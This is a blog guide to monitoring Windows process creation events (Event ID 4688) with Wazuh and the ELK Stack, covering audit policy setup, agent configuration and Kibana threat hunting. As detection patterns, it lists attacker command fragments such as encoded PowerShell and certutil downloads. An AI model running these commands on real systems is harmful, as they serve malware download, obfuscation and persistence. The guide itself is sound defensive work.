Home » Blog » Monitoring Windows Process Creation Events with Wazuh and ELK

Information

Monitoring Windows Process Creation Events with Wazuh and ELK

Benhcmark Administrator

18/11/2025

1 View 0

SaveSavedRemoved 0

Mastering Threat Detection: A Guide to Monitoring Windows Process Creation with Wazuh

Every second, thousands of processes are launched and terminated across your Windows environment. While the vast majority are routine and harmless, hidden among them could be the critical first signs of a security breach. Unauthorized software, malware execution, and lateral movement attempts all begin with a single action: creating a new process. Without visibility into this fundamental activity, security teams are effectively flying blind.

This guide provides a comprehensive walkthrough on how to harness the power of Wazuh and the ELK Stack to monitor Windows process creation events, turning raw log data into actionable security intelligence.

Why Is Process Creation Monitoring So Important?

Monitoring process creation is a cornerstone of modern endpoint security and threat hunting. By scrutinizing which processes are starting, who or what started them, and with what commands, you gain invaluable insight into the health and security of your systems.

• Early Malware Detection: Many types of malware, including ransomware and trojans, reveal themselves by launching suspicious processes or using legitimate tools like PowerShell for malicious purposes. Tracking process creation is your first line of defense in spotting these anomalies.
• Identifying Unauthorized Software: If an employee installs unapproved software, you’ll see the setup process launch. This helps enforce IT policies and reduce the attack surface created by shadow IT.
• Uncovering Lateral Movement: Attackers who have gained a foothold often use tools like PsExec or Windows Management Instrumentation (WMI) to execute commands on other machines. Monitoring parent-child process relationships (e.g., services.exe spawning psexec.exe) can expose these lateral movement techniques.
• Investigative Forensics: In the event of an incident, a detailed audit trail of every process that ran is crucial for understanding the attacker’s full chain of actions. This data helps answer critical questions about how the breach occurred and what data was compromised.

The Tools for the Job: Wazuh and the ELK Stack

To build a robust and scalable monitoring solution, we rely on two powerful open-source platforms working in tandem:

1. Wazuh: A Security Information and Event Management (SIEM) and Extended Detection and Response (XDR) platform. Wazuh agents are deployed on your Windows endpoints to collect logs, monitor for security events, and report back to a central Wazuh manager.
2. The ELK Stack (Elasticsearch, Logstash, Kibana): A suite of tools for data storage, aggregation, and visualization. The Wazuh manager forwards its analyzed data to Elasticsearch for long-term storage and high-speed searching. Kibana provides a powerful web interface for creating dashboards and visualizing the data, making it easy to spot trends and threats.

Think of Wazuh as the on-site security guard on each machine, actively collecting intelligence, while the ELK Stack is the central command center where all that intelligence is organized, analyzed, and displayed on a monitor wall.

Step-by-Step: Implementing Process Creation Monitoring

Step 1: Enable the Windows Audit Policy

By default, Windows does not log the detailed process creation events needed for security monitoring. You must first enable this feature. This is done by activating the “Audit Process Creation” policy.

You can enable this using the Group Policy Management Console (GPMC) for domain-wide deployment or locally using the Local Security Policy editor (secpol.msc).

• Navigate to: Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Detailed Tracking
• Enable “Audit Process Creation” for both Success and Failure.

Once enabled, Windows will begin logging Event ID 4688 in the Security event log every time a new process is started. This is the key event we need to capture.

Step 2: Configure the Wazuh Agent

Next, you need to ensure the Wazuh agent on your Windows endpoints is configured to collect events from the Security log. This is typically handled by default, but it’s essential to verify.

In the agent’s configuration file (ossec.conf), ensure you have a block that monitors the Security event channel:

<localfile>
  <location>Security</location>
  <log_format>eventchannel</log_format>
</localfile>

The Wazuh agent will now collect all Security logs, including the crucial Event ID 4688, and forward them to the Wazuh manager for analysis. The manager comes with pre-built rules to parse and identify these events automatically.

Step 3: Hunt for Threats in Kibana

With data flowing from your Windows endpoints through the Wazuh manager and into Elasticsearch, you can now use Kibana to hunt for threats. The Wazuh plugin for Kibana provides pre-built dashboards, but creating your own visualizations focused on process creation can be incredibly powerful.

Actionable Security Tips for Your Dashboards:

• Monitor for Suspicious Parent Processes: Create a visualization that shows uncommon parent-child relationships. For example, Microsoft Office applications (like WINWORD.EXE or EXCEL.EXE) should almost never be the parent of powershell.exe or cmd.exe. This pattern is a classic indicator of a malicious document macro.
• Track Command-Line Arguments: Event ID 4688 includes the full command line used to launch a process. Search for suspicious strings associated with living-off-the-land techniques, such as:
  • powershell.exe -enc (Indicates an encoded command, often used for obfuscation)
  • certutil.exe -urlcache -split -f (Used to download malicious files from the internet)
  • schtasks.exe /create (Used to establish persistence)
• Create Alerts for High-Risk Events: Configure Wazuh or Elasticsearch alerts to notify you immediately when a high-risk process is detected. For instance, trigger an alert if psexec.exe is seen running anywhere outside of your IT administrators’ workstations.

A Real-World Use Case: Detecting a Phishing Attack

Imagine a user receives a phishing email and opens a malicious Word document. Here’s how this monitoring setup would detect the attack:

1. The user opens the document, launching WINWORD.EXE.
2. The malicious macro inside the document executes, spawning a new process: powershell.exe.
3. The Wazuh agent captures Event ID 4688, showing WINWORD.EXE as the parent process and powershell.exe as the new process. The event log also captures the full, obfuscated PowerShell command line.
4. The Wazuh manager receives the event, and its rules flag it as suspicious.
5. In Kibana, a security analyst sees this anomalous parent-child relationship on their dashboard and is immediately alerted to the potential compromise, allowing for rapid response before the attacker can escalate privileges or deploy ransomware.

Conclusion

Monitoring Windows process creation is not a luxury—it is a fundamental requirement for any effective security posture. By leveraging the combined strengths of Wazuh and the ELK Stack, you can gain deep visibility into your endpoint activity, detect threats in their earliest stages, and empower your security team with the data they need to conduct thorough investigations. Implementing this capability moves you from a reactive to a proactive security model, enabling you to hunt for threats before they cause significant damage.

Source: https://kifarunix.com/monitor-process-creation-events-on-windows-systems-using-wazuh-and-elk-stack/